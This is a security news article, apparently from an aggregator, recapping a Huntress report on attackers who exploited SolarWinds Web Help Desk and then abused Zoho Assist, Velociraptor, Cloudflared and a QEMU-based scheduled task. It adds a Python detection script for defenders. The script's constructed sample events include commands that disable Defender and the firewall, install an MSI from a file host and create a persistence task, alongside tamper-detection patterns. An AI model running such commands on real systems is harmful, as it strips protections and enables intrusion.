
A Coordinated Abuse of Trusted Software
Cybercriminals are increasingly blurring the line between legitimate administration tools and malicious infrastructure. A newly observed campaign exploiting critical vulnerabilities in SolarWinds Web Help Desk (WHD) shows how attackers turn trusted enterprise software into stealthy attack platforms, evading traditional security controls while maintaining long-term access to compromised networks.
Summary of the Original Findings
Researchers from Huntress have uncovered an active exploitation campaign targeting SolarWinds Web Help Desk deployments exposed to the internet. The attackers leveraged two recently disclosed vulnerabilities, CVE-2025-40551 and CVE-2025-26399, both rated critical and both enabling unauthenticated remote code execution.
Initial Access via Critical Vulnerabilities
The campaign appears to have started around January 16, 2026, and was detected during the weekend of February 7, 2026. Huntress confirmed that at least three organizations were compromised after attackers exploited the WHD flaws to gain an initial foothold without valid credentials.
Deployment of Legitimate Remote Access Tools
Once access was achieved, the threat actor rapidly installed Zoho Assist using an MSI installer hosted on the Catbox file-sharing service. The agent was configured for unattended access, meaning it accepts remote sessions without anyone at the console approving them, which effectively handed the attackers full interactive control of the affected systems.
Anonymous Infrastructure Registration
The compromised hosts were registered to a Zoho Assist account linked to an anonymous Proton Mail address, allowing the attackers to blend into legitimate remote support traffic while maintaining persistent access.
Hands-On Activity and Network Reconnaissance
Zoho Assist was used for direct keyboard interaction and Active Directory reconnaissance, enabling the attacker to understand the internal structure of the environment and identify high-value targets.
Introduction of Velociraptor for Command and Control
The attackers then deployed Velociraptor, a well-known digital forensics and incident response (DFIR) tool, downloaded from a Supabase storage bucket. Although designed for defensive purposes, Velociraptor was repurposed as a command-and-control framework.
Abuse of Cloudflare Workers
Velociraptor communications were routed through Cloudflare Workers, so the agents' outbound traffic was ordinary HTTPS to Cloudflare-owned infrastructure, the kind of connection that is unlikely to raise alarms in enterprise environments.
Exploiting Known Tool Weaknesses
Huntress noted that the attackers deliberately used an outdated version of Velociraptor, version 0.73.4, which contains a known privilege escalation vulnerability. This allowed them to elevate permissions on compromised hosts. Defenders should treat any Velociraptor binary they did not deploy themselves as hostile regardless of version, and inventory the versions of the agents they did deploy.
Redundant Access via Cloudflare Tunnels
To ensure persistence, the attackers installed Cloudflared directly from Cloudflare’s official GitHub repository. This created a secondary tunnel-based access method, offering redundancy if other access paths were disrupted.
Advanced Persistence Techniques
In some environments, persistence was further reinforced through a scheduled task named “TPMProfiler,” which opened an SSH backdoor using QEMU, an unusual but effective technique for maintaining covert access.
Defensive Controls Disabled
The attackers modified Windows registry settings to disable Microsoft Defender and the Windows Firewall. This step ensured that additional payloads could be downloaded and executed without interference.
Rapid Tool Expansion
Almost immediately after disabling Defender, the threat actor downloaded a fresh copy of Visual Studio Code, likely to leverage its tunneling features or extensions for further operational flexibility.
Limited Attribution and Disclosure
Neither Huntress nor Microsoft attributed the campaign to a known threat group. Microsoft described the affected environments only as “high-value assets,” offering no additional details about the victims.
Recommended Mitigation Steps
Organizations are urged to upgrade SolarWinds Web Help Desk to version 2026.1 or later, remove public exposure of WHD administrative interfaces, and reset all credentials associated with the platform, including any directory or mail integration accounts stored in WHD, since unauthenticated code execution on the server gives an attacker access to everything the application itself can read.
Detection Guidance for Defenders
Huntress released Sigma rules and indicators of compromise designed to detect suspicious Zoho Assist usage, Velociraptor deployments, Cloudflared activity, silent MSI installations, and encoded PowerShell execution.
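The following Python block is an added example, not Huntress's published Sigma rules or indicators. It turns the persistence and defense-evasion tradecraft described above (the silent MSI install, the registry and firewall tampering, the Velociraptor and Cloudflared installs, the QEMU scheduled task) into simple detection logic run over process-creation events with Sysmon-style Image and CommandLine fields, and it decodes -EncodedCommand PowerShell before matching so that tampering hidden inside base64 is still caught. Every sample event, path, file name and token below is constructed for the example; the rule names, field names and the untrusted-host list are assumptions, not anything from the Huntress report.

```python
import base64
import re

# Detection logic over process-creation telemetry (Sysmon Event ID 1 style
# fields: Image, CommandLine). Rules and sample events are constructed for
# this example; they are not the vendor's published rules or real telemetry.

ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
DEFENSE_TAMPER = re.compile(
    r"(?i)DisableAntiSpyware|DisableRealtimeMonitoring|advfirewall\s+set\s+\w+\s+state\s+off"
)
# Hosts named above as staging or C2 infrastructure (Catbox, Supabase,
# Cloudflare Workers): flagged as untrusted download sources, not blocked.
UNTRUSTED_HOSTS = re.compile(r"(?i)catbox\.moe|supabase\.co|workers\.dev")


def image_name(event):
    """Basename of the executing image, lower-cased."""
    return event.get("Image", "").rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(cmdline):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def rule_silent_msi_install(event):
    cl = event.get("CommandLine", "")
    return (image_name(event) == "msiexec.exe"
            and re.search(r"(?i)\s/i\s", cl) is not None
            and re.search(r"(?i)\s/(?:qn|quiet)\b", cl) is not None)


def rule_encoded_powershell(event):
    return (image_name(event) in ("powershell.exe", "pwsh.exe")
            and decode_encoded_powershell(event.get("CommandLine", "")) is not None)


def rule_defense_tamper(event):
    # Match against the raw command line plus any decoded PowerShell payload.
    cl = event.get("CommandLine", "")
    return DEFENSE_TAMPER.search(cl + " " + (decode_encoded_powershell(cl) or "")) is not None


def rule_velociraptor_client_install(event):
    return ("velociraptor" in image_name(event)
            and "service install" in event.get("CommandLine", "").lower())


def rule_cloudflared_tunnel(event):
    cl = event.get("CommandLine", "").lower()
    return image_name(event) == "cloudflared.exe" and ("tunnel" in cl or "service install" in cl)


def rule_qemu_scheduled_task(event):
    cl = event.get("CommandLine", "")
    return (image_name(event) == "schtasks.exe"
            and re.search(r"(?i)/create\b", cl) is not None
            and re.search(r"(?i)qemu|TPMProfiler", cl) is not None)


def rule_untrusted_download_source(event):
    return UNTRUSTED_HOSTS.search(event.get("CommandLine", "")) is not None


RULES = {
    "silent_msi_install": rule_silent_msi_install,
    "encoded_powershell": rule_encoded_powershell,
    "defense_tamper": rule_defense_tamper,
    "velociraptor_client_install": rule_velociraptor_client_install,
    "cloudflared_tunnel": rule_cloudflared_tunnel,
    "qemu_scheduled_task": rule_qemu_scheduled_task,
    "untrusted_download_source": rule_untrusted_download_source,
}


def evaluate(event):
    """Names of every rule the event matches."""
    return [name for name, pred in RULES.items() if pred(event)]


def scan(events):
    """Map event index -> matched rule names, omitting clean events."""
    return {i: hits for i, e in enumerate(events) if (hits := evaluate(e))}


# Constructed sample telemetry (paths, file names and the token are made up).
ENCODED_PAYLOAD = base64.b64encode(
    "Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs -p"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /i https://files.catbox.moe/example.msi /qn /norestart"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoProfile -enc {ENCODED_PAYLOAD}"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh.exe advfirewall set allprofiles state off"},
    {"Image": r"C:\ProgramData\Velociraptor\velociraptor.exe",
     "CommandLine": "velociraptor.exe --config client.config.yaml service install"},
    {"Image": r"C:\ProgramData\cloudflared\cloudflared.exe",
     "CommandLine": "cloudflared.exe tunnel run --token REDACTED"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /tn TPMProfiler /sc onstart /ru SYSTEM /tr "C:\ProgramData\qemu\qemu-system-x86_64.exe -nographic -hda disk.qcow2"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"][:60], "->", ", ".join(hits))
```

The benign svchost and the unencoded -File PowerShell invocation produce no hits, which is the point of matching on tool plus argument combinations rather than on the presence of msiexec, PowerShell, Velociraptor or Cloudflared alone: all four are legitimate in most environments, and only the install-from-a-file-host, the decoded Defender tampering, the unsanctioned agent install and the QEMU-backed scheduled task distinguish this intrusion chain from routine administration.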
What Undercode Says:
A Shift Toward Living-Off-The-Land at Scale
This campaign highlights a broader industry trend: attackers no longer rely solely on custom malware. Instead, they weaponize trusted enterprise tools to operate quietly within legitimate workflows.
Trust as the Primary Attack Surface
By abusing widely used platforms like Zoho Assist, Cloudflare tunnels, and Velociraptor, attackers exploit organizational trust rather than software bugs alone. Security teams are conditioned to allow these tools, and that conditioning creates blind spots.
DFIR Tools as a Double-Edged Sword
Velociraptor’s flexibility makes it powerful for defenders, but that same flexibility allows attackers to repurpose it as a full-featured C2 framework. This raises uncomfortable questions about how defensive tooling should be monitored.
Cloud Infrastructure as Camouflage
Routing command-and-control traffic through Cloudflare Workers and tunnels gives attackers a level of legitimacy that traditional malicious infrastructure lacks. Blocking such traffic outright is often operationally impossible.
Exploiting the Patch Gap
The rapid exploitation of newly disclosed vulnerabilities underscores how short the window has become between disclosure and weaponization. Delayed patching is no longer a minor risk—it is an open invitation.
Persistence Through Redundancy
The use of multiple access channels—Zoho Assist, Velociraptor, Cloudflared, and SSH backdoors—shows a mature operational mindset focused on resilience rather than quick impact.
Security Tool Fatigue
Many organizations struggle to distinguish normal administrative behavior from malicious activity when attackers use the same tools as IT teams. The result is alert fatigue and delayed response.
Implications for Zero Trust
This campaign demonstrates that Zero Trust principles must extend beyond network access to include continuous behavioral validation of tools, users, and sessions.
Detection Over Prevention
Preventing the installation of legitimate tools is often unrealistic. Detection strategies must focus on context, timing, and unusual configurations rather than binary allow-or-deny logic.
The Cost of Implicit Allowlisting
Implicitly trusting software because it is “legitimate” is becoming a liability. Every powerful administrative tool should be treated as a potential attack vector.
A Wake-Up Call for IT Visibility
Security teams need deeper visibility into how remote access, tunneling, and DFIR tools are used across the enterprise, not just whether they are present.
Fact Checker Results
Vulnerability Exploitation Claims
✅ Confirmed: CVE-2025-40551 and CVE-2025-26399 enable unauthenticated remote code execution.
Tool Abuse Observations
✅ Verified: Zoho Assist, Velociraptor, and Cloudflared were used as part of the intrusion chain.
Threat Attribution
❌ Unconfirmed: No specific threat actor has been officially identified.
Prediction
Accelerated Exploitation Cycles 🔥
Attackers will continue to exploit critical enterprise software vulnerabilities within days of disclosure.
Increased Abuse of Legitimate Tools ⚠️
Remote management and DFIR platforms will become even more attractive as stealthy attack infrastructure.
Stricter Controls on Admin Software 🔒
Organizations will be forced to rethink how much implicit trust they place in powerful IT tools.
References:
Reported By: www.bleepingcomputer.com